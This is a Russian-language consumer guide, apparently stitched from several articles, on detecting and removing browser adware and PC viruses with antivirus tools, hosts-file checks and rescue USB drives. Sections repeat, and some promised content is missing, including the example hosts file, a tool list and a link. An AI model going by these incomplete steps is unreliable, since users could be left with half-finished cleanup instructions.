    Сюда же можно добавить отсутствие антивируса на ПК или ноутбуке. Конечно, от всех вирусов он вас не защитит, но некоторые все же обнаружит и удалит. А если думать головой и вручную проверять подозрительные файлы антивирусом, это поможет вам избежать многих проблем. В этом можете быть уверены.

    Как почистить браузер от вирусов и рекламы

    С причинами и симптомами вирусов разобрались, теперь перейдем к главному. Итак, как избавиться от рекламного вируса в браузере? Здесь все зависит от того, какую именно заразу вы словили. Впрочем, ниже приведена пошаговая инструкция, выполнив которую вы сможете вылечить браузер от различных рекламных вирусов.

    Она является универсальной и подходит для любого интернет-браузера – Google Chrome, Opera, Mozilla Firefox, Yandex Browser, Microsoft Edge. Так что пользоваться ею могут все пользователи.

    Итак, чтобы избавиться от вирусов в браузере, выполните следующие действия:

    Запустите полную проверку ПК или ноутбука антивирусом

    Проверьте дополнения в браузере

    Некоторые расширения устанавливаются сами. Поэтому зайдите в браузер и проверьте, есть ли там дополнения, которые вы не ставили. Также рекомендуется удалить те из них, которыми не пользуетесь.

    Проверьте установленные приложения

    Чтобы открыть их, перейдите в Пуск – Панель управления – Программы и компоненты.

    Иногда вредоносные модули устанавливаются как обычный софт (например, Webalta). Чтобы удалить вирус, запускающий рекламу в браузере, достаточно лишь найти его и удалить из этого списка.

    Проверьте ярлык браузера

    Если после его запуска сразу открывается страница Вулкана или другого рекламного сайта, то, скорее всего, проблема кроется в ярлыке. Иногда вирусы прописывают в свойствах ярлыка (в поле «Объект») адрес сайта, который и открывается при запуске браузера. Чтобы решить эту проблему, удалите ярлык и создайте новый.

    Проверьте файл hosts

    Также многие вирусы редактируют и этот файлик. В результате при открытии какого-то популярного веб-сайта открывается другой (внешне он выглядит так же, и разницы вы не заметите). А далее появляются сообщения с просьбой отправить смс, всплывающие окна, агрессивная реклама и т.д. Убрать этот рекламный вирус можно двумя способами. Первый – с помощью антивирусной утилиты AVZ. А второй – вручную. Для этого:

    1. Перейдите по пути C:\Windows\System32\drivers\etc.
    2. Откройте файл hosts через блокнот.
    3. Удалите лишние строчки. Нормальный файл hosts должен выглядеть следующим образом:

    Программы для очистки браузера от вирусов

    Также существуют специальные программы для удаления вирусов в браузере. Они видят то, что пропустили антивирусы и помогают избавиться от вредоносных рекламных модулей.

    AdwCleaner

    Первая отличная программа для очистки браузера от рекламы и вирусов – AdwCleaner (ссылка на оф. сайт).

    Эта утилита выполнит быстрый поиск вирусов в браузере и найдет все рекламные тулбары, баннеры, вредоносные скрипты. Также умеет осуществлять очистку ярлыков, файлов и реестра.

    Malwarebytes

    Еще одна эффективная программа для чистки браузеров от вирусов. Быстро просканирует ПК или ноутбук и поможет избавиться от всплывающих окон и надоевшей рекламы (ссылка на оф. сайт).Ее возможностей более чем предостаточно, чтобы найти вирус в браузере и удалить его.

    Защита браузера от рекламы и вирусов

    И напоследок, как и обещал, приведу несколько полезных советов о том, как защитить браузер от вирусов:

    1. Установите на ноутбук или ПК антивирус. Можно бесплатный. Главное – не забывайте обновлять его (или включите автообновление). В половине случаев он поможет вам удалить вирус из браузера. А точнее – не допустить заражения. Рекомендую прочитать: .
    2. Установите программу для удаления рекламных вирусов. То, что пропустят антивирусы, заметят специальные утилиты вроде AdwCleaner или HitmanPRO. При таком сочетании ни одна зараза на ваш ПК просто не пролезет. А для собственного спокойствия периодически запускайте проверку браузера на вирусы (например, 1 раз в месяц).
    3. Установите расширение в браузере для блокировки рекламы. Это может быть Adblock или Adguard – на ваше усмотрение. А если захотите отключить рекламу на любимом сайте или блоге (чтобы поддержать его владельца материально), просто добавьте этот веб-ресурс в исключение.

    И самое главное: думайте головой! Не загружайте подозрительные exe-файлы (особенно, если вам нужен фильм в формате avi или mkv), не переходите по неизвестным ссылкам, не заходите на сомнительные сайты.

    Как говорится, самый лучший антивирус – тот, который сидит по ту сторону монитора 🙂 . То есть, пользователь. Если же вы будете нарушать вышеописанные правила, то никакой антивирус вам не поможет. В интернете нужно быть предельно осторожным – помните об этом!

    Вместо выводов

    На этом все. Теперь вы знаете, что делать, если в браузере вирус, а также массу способов удалить его. Но лучше все же не допускать заражения. И тогда никакие всплывающие окна, рекламные вкладки и баннеры не будут вас беспокоить.

    Злоумышленники создают специальные программы, которые затрудняют работу на ПК, вымогают деньги, крадут личные данные и передают третьим лицам. Эти вредоносные приложения называются вирусами, и они поражают незаметно для пользователя компьютер. Удалить их можно при помощи программ-защитников, которые разработаны для обнаружения и устранения угроз, как со съемных носителей (диск, флешка), так и через интернет.

    Как выявить вирус на компьютере

    Вредоносное ПО представляет собой саморазмножающуюся программу, которая в большей или меньшей степени влияет на работу ноутбука или ПК. Некоторые из них могут долго бездействовать и человек даже не подозревает о проблеме. В определенный момент приложение активируется и блокирует Windows, какую-то определенную часть данных или весь винчестер, требует заплатить деньги, чтобы человек мог вновь пользоваться своим компьютером. Есть и другие признаки, которые указывают на наличие вируса в ПК.

    Виды вирусных программ

    Существует несколько типов вредоносных утилит, которые следует удалить с компьютера для безопасности данных. Вирусы характеризуется тем, что получают доступ к ПК или управляют им без вашего разрешения. Основная цель вредоносных программ – вымогательство или нарушение работоспособности устройства. Выделяют следующие виды опасного ПО:

    1. Троянский конь или просто троян. Название связано с тем, что код проникает в другие программы, какое-то время бездействует. Когда запускается приложение-хозяин, вирус активируется. Как правило, он используется для кражи данных, удаления приложений. Распространяться далее по ПК самостоятельно он не может.
    2. Червь. Приводит к тому, что система тормозит, очень медленно загружаются странички в интернете, открываются папки. Проникают такие вирусы часто через письма или установочные файлы. Основная цель червя – забить систему «мусором».
    3. Программа-шпион. Вредоносный код проникает на ПК и собирает всю возможную информацию о пользователе, его действиях. Стараются вирусы украсть и номера счетов или карт, адреса, пароли.
    4. Зомби. Название связано с тем, что вирус превращает компьютер в «безвольную игрушку» злоумышленника. Подчиняется ПК только ему и повлиять на него вы уже не можете. Человек не сразу замечает, что компьютер уже не только его.
    5. Баннер (программа-блокировщик). Действия вируса просты – он закрывает доступ к Виндовс. Пользователь включает устройство, но вместо рабочей среды видит только большой баннер-окно, где находится какое-то сообщение о нарушении авторских прав или обвинение в использовании пиратского софта или даже распространении порнографических материалов. Далее пишут о том, что избежать наказания вы можете только, если выплатите определенную сумму на счет или номер телефона по смс. Делать этого нельзя, потому что управление ПК к вам не вернется.
    6. Эксплоит. Этот вид вредоносного ПО проникает через уязвимости в системе защиты Windows. Приложение собирает информацию для захвата управления над устройством.
    7. Загрузочные вирусы. Проникают в сектор винчестера, который отвечает за включение операционной системы. Вредоносное ПО замедляет процесс загрузки ОС с жесткого диска, а через какое-то время и вовсе не дает ее запустить.
    8. Фарминг. Эти вирусы проникают на компьютер вместе с червями, троянами и подсаживаются в браузер. Далее пользователя при загрузке страниц в интернете перенаправляют на сторонние сайты.
    9. Рутик. Вид вируса, который открывает доступ злоумышленнику к программам жертвы, а затем полностью скрывать свое присутствие.
    10. Программный вирус. Вредоносный код «прилипает» к одной из установленных утилит на ПК и начинает нарушать ее работу, активно размножаться, что отличает его от червя.

    Признаки заражения компьютера вредоносным по

    После проникновения вируса ПК работает нестабильно. Проявлений заражения много, но существует определенный перечень, который точно указывает на наличие проблемы. Удаление компьютерных вирусов следует проводить, когда вы заметили следующие симптомы вирусов:

    1. Ощутимо снижается скорость работы устройства без видимых на то причин (поломка деталей и т.д.), Виндовс начинает зависать.
    2. Не получается открыть файлы или появились «битые» (испорченные) документы. Обеспокоиться следует, если не открываются программы с расширением exe.
    3. Ошибки, сбои приложений, замедление работы программ.
    4. Блокирование некоторых страниц в интернете, особенно, если это коснулось популярных ресурсов вроде ВКонтакте, Youtube, Одноклассники.
    5. При загрузке Windows появляется сообщение с требованием отправить СМС для разблокировки.
    6. Изменение или пропажа паролей, доступов к разным ресурсам.

    Удаление вирусов с компьютера антивирусной программой

    1. Скачайте, установите антивирус. Программное обеспечение этого вида помогает пользователю при минимальных усилиях избавиться от заражения системы. Антивирус способен удалить вредоносные файлы без нарушения работы ядра системы. Вручную работать с системными файлами очень сложно, начинающий пользователь не сможет этого сделать. Важно скачивать антивирусные программы с официального сайта. Инсталлировать сразу несколько защитников не стоит, они часто конфликтуют между собой.
    2. Обновление базы антивируса. Чтобы успешно удалить трояна или червя, защитник должен иметь о нем данные. Базы обновляются постоянно, добавляются новые методы обнаружения вредоносного ПО. Обновляйте вручную антивирус регулярно.
    3. Отключите интернет. Это не даст шпиону отправлять данные создателю. Пока вы будете лечить свой ПК, отсоедините шнур или выключите Wi-Fi.
    4. Глубокая проверка системы. Если вы уверены, что червь сидит в определенной папке, то можно запустить глубокую проверку отдельной директории или папки. Это исключит вероятность пропуска других вредоносных программ, которые с основным вирусом.

    Встроенный Microsoft Security Essential

    При установке операционной системы Windows есть стандартный антивирус от Майкрософт. Он может проводить на базовом уровне проверку системы и при необходимости удалить вирусы. Если вы пользуетесь не 10-й версией операционки, то загрузить Microsoft Security Essential придется отдельно из интернета. Обладает утилита следующими преимуществами и недостатками:

    • Плюсы. Обеспечивают хорошую защиту на базовом уровне, никак не влияет на работу системы, не загружает ее.
    • Минусы. Малая функциональность, не может обнаружить сложные программы-баннеры, браузерные трояны.

    Kaspersky Free

    Это популярный на постсоветском пространстве антивирус. Данная версия не является полной и распространяется на бесплатной основе, но справиться с некоторыми вирусами она все же поможет. Скачать Kaspersky Free можно на официальном сайте. Приложение может удалить большинство известных троянов, червей и шпионов даже с урезанным функционалами. Выделяют следующие преимущества и недостатки:

    • Плюсы. Простой, понятный интерфейс приложения. Чтобы удалить вирус, используется та же база, что и в платной версии продукта. Обеспечивает утилита хорошую файловую и веб-защиту, обладает высоким быстродействием.
    • Минусы. Бесплатная версия не включает файерволы, родительский контроль, сетевую защиту и еще несколько функций. Некоторые сложные вирусы программа не распознает.

    Avast Free Antivirus

    Еще один популярный вариант, который поможет вам обезвредить вредоносные программы – Аваст (Avast). Имеет бесплатную версию, которая способна удалить большинство известных червей, шпионов и троянов. Независимые тесты установили, что Аваст при диагностике выявляет 99 % угроз в 10, 8 и 7 версии Виндовс. Обязательно укажите электронный ящик при регистрации продукта – это откроет вам доступ к использованию антивируса бесплатно на целый год. Выделяют следующие преимущества и недостатки.

    • имеет анализ для оценки потенциальной угрозы от файла, защищает от большинства червей, троянов и т.д.;
    • понятный, простой интерфейс приложения;
    • включает дополнительные функции для защиты системы, у пользователя есть возможность индивидуальной настройки под себя;
    • выполняет защиту дополнений браузеров, расширений, проводит сканирование при загрузке;
    • можно включить геймерский режим, при котором останавливаются некоторые режимы проверки, чтобы снизить потребление ресурсов антивирусом;
    • встроенный менеджер паролей;
    • защита устройства при подключении к неизвестными Wi-Fi сетям;
    • регулярные обновления базы данных.
    • использовать бесплатную версию можно только на личном ПК, недоступна для коммерческих целей;
    • периодически появляются окна с предложением купить антивирус;
    • каждый год требуется продлевать регистрацию.

    Dr. Web Curelt

    Это не совсем антивирус, это сканер, который помогает вам просканировать систему для выявления зараженных файлов и вредоносного ПО. Он поможет их удалить, но осуществлять защиту на постоянной основе приложение не может. Разработчики советуют применять доктора Web совместно с другой антивирусной программой для контроля тех вирусов, которые пропустил основной защитник.

    • не нужно устанавливать программу;
    • помогает удалить троянских шпионов, почтовых червей, макро- и стелс-вирусы, полиморфные программы;
    • может лечить, а не только удалять поврежденные данные;
    • устраняется кейлогеры, рекламные баннеры, программы-дозвонщики;
    • регулярное обновление баз.
    • нет автоматического обновление баз данных, приходится удалять программу полностью и скачивать заново;
    • нет веб-режима.

    BitDefender Antivirus Plus 2019

    Распространяется как на платной, так и на бесплатной основе. Вторая версия имеет урезанный функционал, но от вирусов защищает. Регулярное обновление вирусных баз, глубокое сканирование обеспечивает высокий уровень защиты. Специалисты в сфере антивирусной безопасности высоко оценивают эту программы. Выделяют некоторые преимущества и недостатки BitDefender Antivirus Plus 2019.

    • регулярное обновление базы данных;
    • стабильная эффективность сканирования угроз;
    • простой, минималистичный интерфейс, нет ненужных «наворотов», часто всплывающих окон с предложением купить полную версию;
    • можно составить расписание для проверки ПК, провести быстрое сканирование;
    • не потребляет много ресурсов системы, не вызывает торможения работы ОС.
    • не поддерживает русский язык;
    • проверяет всю систему целиком, выполнить проверку отдельного диска или папки нельзя.

    Как убрать вирусы с компьютера, блокирующие Windows

    Работа некоторых программ-злоумышленников может заблокировать доступ к операционной системе на этапе загрузки. Пользователь не может зайти в безопасный режим, вызвать диспетчер задач, чтобы закрыть подозрительный процесс или вызвать командную строку для работы с реестром. Самым жестким решением в этом случае станет отформатировать полностью винчестер и установить заново Windows. Это приведет к полной потере данных с диска С. Если же вирусная утилита поселилась в директории D, то ситуация может повториться.

    Во избежание таких ситуаций у вас должен быть аварийный загрузочный носитель. Он помогает запустить антивирус еще на старте запуска компьютера без входа в Виндовс. Произойдет автозагрузка, которая позволит выполнить проверку системы и вернуть к рабочему состоянию. Использовать для создания аварийной загрузки можно дисковод или флешку и специальный софт.

    «Аварийные» загрузочные диски

    Если не получается загрузить систему и удалить вирусный объект, необходимо использовать Live CD. Представляет собой этот диск специальную загрузочную версию программы, которая помогает проверить и удалить вирусы из ОС. Если же лечение не удалось, то будет возможность скопировать с HDD на альтернативные носители информации. Для этих создания Live CD используют такие популярные утилиты:

    1. Dr.Web® LiveCD – инструмент от одноименной компании. Очень простой и доступный набор, который работает безотказно.
    2. LiveCD ESET NOD32. Помогает очистить ПК от вирусов, но процедура занимает продолжительное время.
    3. Kaspersky Rescue Disk 10. Вариант аварийного набора, который работает быстро и поддерживает русский язык.

    Для создания самого диска требуется просто следовать указаниям инсталлятора. Далее перезагрузите компьютер и зайдите в BIOS. Как только начинает загружаться ПК кликайте F2 или Del, чтобы туда попасть. Вам необходимо найти вкладку, которая имеет в название слово Boot. Установите дисковод в качестве приоритетного носителя для загрузки, нажмите F10 для сохранения и перезагрузки ПК.

    • пустая флешка;
    • образ антивируса Касперского – Kaspersky Rescue Disk;
    • программа для создания аварийной флешки – Kaspersky USB Rescue Disk Maker.

    Начните с программы, дважды клинике по ней левой клавишей мыши и выполняйте следующую пошаговую инструкцию:

    1. Появится окно, куда нужно распаковать приложение. Можно установить ее туда же. Где лежит архив. Жмите на кнопку Install.
    2. Утилита запуститься автоматически после распаковки. Кликните по слову «Обзор».
    3. Укажите место, где хранится образ антивируса Касперского.
    4. Далее нужно выбрать USB-носитель, куда требуется записать программу. Щелкните по надписи «Старт».
    5. Важно, чтобы флешка имела формат файловой системы FAT или FAT32. Появится окошко, где можно выбрать этот параметр. Нажмите «Да».
    6. Дождитесь завершения записи.
    7. Появится окно с оповещением об успешном создании аварийной флешки.

    Далее необходимо подготовить сам ПК для работы с загрузочным носителем. Перезагрузите устройство, перейдите в БИОС (как это сделать описано в предыдущем пункте). Вам необходимо зайти в раздел BOOT и выставить в конфигурации загрузки, чтобы первой была флешка. После включения этой опции нажмите F10, чтобы перезапустить ПК. При верном выполнении всех действий появится интерфейс Касперского, сразу же нужно нажать «Enter». Далее при помощи стрелок выберете Русский язык, примите условия лицензирования и запустите графический режим.

    На следующем этапе запустится проверка системы, выставьте птички напротив каждого диска. Программа просканирует систему чтобы внести исправления и выполнить восстановление тех файлов, которые можно вылечить. Самих червей, троянов и шпионов нужно удалить. После окончания работы загрузочной флешки перезагрузите систему. Не забудьте снова зайти в БИОС и сделать загрузку с HDD первым в очереди.

    Видео

    На сегодняшний день поголовье вирусов исчисляется сотнями тысяч! Среди такого разнообразия подхватить эту заразу к себе на компьютер проще простого!

    В этой статье последовательно рассмотрим, как можно удалить вирусы с компьютера в различных ситуациях.

    1. Что такое вирус. Симптомы заражения вирусами

    Вирус - это само размножающаяся программа. Но если бы они только размножалась, то бороться с ними можно было бы не так рьяно. Часть вирусов может существовать вообще никак не мешая пользователю до определенного момента и в час икс даст о себе знать: могут блокировать доступ к определенным сайтам, удалять информацию и т.д. В общем, мешают пользователю нормально работать за ПК.

    Компьютер при заражении вирусом начинает вести себя нестабильно. Вообще, симптомов может быть десятки. Иногда пользователь даже не догадывается, что у него на ПК вирус. Стоит насторожиться и проверить компьютер антивирусом, если есть следующие признаки:

    1) Снижение скорости работы ПК. Кстати, про то, (если, конечно, у вас нет вирусов) мы разбирали ранее.

    2) Файлы перестают открываться, часть файлов может стать испорчена. Особенно, это касается программ, т.к. вирусы заражают exe и com файлы.

    3) Снижение скорости работы программ, служб, сбои и ошибки приложений.

    4) Блокировка доступа к части интернет-страничек. Особенно самых популярных: вконтакте, одноклассники и пр.

    5) Блокировка ОС Windows, просьба отослать СМС для разблокировки.

    6) Пропажа паролей от доступа к различным ресурсам (кстати, этим занимаются обычно троянские программы, которые, впрочем, можно так же отнести к вирусам).

    Перечень далеко не полный, но если есть хоть один из пунктов - вероятность заражения очень высокая.

    2. Как удалить вирусы с компьютера (в зависимости от вида)

    2.1. «Обычный» вирус

    Под словом обычный следует понимать то, что вирус не заблокирует вам доступ к работе в ОС Windows.

    Для начала следует скачать одну из утилит для проверки компьютера. Одними из лучших являются:

    3) Открываете файл avz.exe.

    4) После запуска AVZ вам будут доступны три основные вкладки: область поиска, типы файлов и параметры поиска.В первой вкладке выберите диски, которые будут проверяться (обязательно выберите системный диск). Поставьте галочки, чтобы программа проверяла запущенные процессы, провела эвристическую проверку системы и искала потенциальные уязвимости. В методике лечения включите опции, которые будут определять, что делать с вирусами: удалять, или спросить у пользователя. Скриншот с перечисленными настройками чуть ниже.

    5) Во вкладке типы файлов, выберите проверку всех файлов, включите проверку всех архивов без исключения. Скриншот ниже.

    6) В параметрах поиска отметьте максимальный режим эвристики, включите детектирование Anti-Rootkit, поиск клавиатурных перехватчиков, исправление системных ошибок, поиск троянских программ.

    7) После задания настроек можно нажать на кнопку пуск. Проверка длится довольно долго, в это время лучше не выполнять параллельно другие процессы, т.к. AVZ часть файлов блокирует. После проверки и удаления вирусов - перезагрузите ПК. Затем установите какой-нибудь и проверьте полностью компьютер.

    2.2. Вирус блокирующий Windows

    Основная проблема с такими вирусами - это невозможность работы в ОС. Т.е. для того, чтобы вылечить компьютер - вам нужен либо второй ПК, либо заранее подготовленные диски. В крайнем случае можно попросить знакомых, друзей и т.д.

    В этой системной утилите можно увидеть, что у вас находится в автозагрузке. Отключите все!

    2) Если компьютер не удается загрузить в безопасном режиме, придется прибегнуть к Live CD. Это специальный загрузочный диск, которым можно проверить диск на наличие вирусов (+ удалить их, если таковые имеются), скопировать данные с HDD на другие носители. На сегодняшний день самыми популярными являются три специализированных аварийных диска:

    Отличная и бесплатная утилита для защиты ПК от вирусов и шпионов. Способен обеспечивать защиту ПК в режиме реального времени.

    Что особо радует: легко устанавливается, быстро работает, не отвлекает вас ненужными сообщениями и уведомлениями.

    Некоторые пользователи считают его не очень надежным. С другой стороны, даже такой антивирус способен вас сберечь от львиной доли опасности. Не у всех же есть деньги на покупки дорогих антивирусов, впрочем, ни одна антивирусная программа не дает 100% гарантии!

    Антивирусный сканер, способный различать огромное количество вирусов. Он легко и быстро встраивается в контекстное меню проводника. Базы регулярно обновляются, благодаря чему антивирус всегда сможет вас оградить от большинства угроз.

    Особо радует нетребовательность данного антивируса. Из минусов, многие отмечают его неказистый вид. Правда, реально ли это так важно для антивирусной программы?

    В любом случае, хотя бы один антивирус на компьютере необходимо иметь (+ крайне желательно установочный диск с Windows и Live CD на случай удаления вирусов).

    Итоги. В любом случае, угрозу заражения легче предотвратить, чем пытаться удалить вирус. Ряд мер способен свести к минимуму риски:

    • Установка антивирусной программы, регулярное ее обновление.
    • Обновление самой ОС Windows. Все таки разработчики не просто так выпускают критические обновления.
    • Не качать сомнительные ключи и трейнеры к играм.
    • Не устанавливать подозрительное ПО.
    • Не открывать почтовые вложения от неизвестных адресатов.
    • Регулярно нужных и важных файлов.

    Даже этот простой набор спасет вас от 99% напастей.

    Желаю вам удалить все вирусы с компьютера без потери информации. Удачного лечения.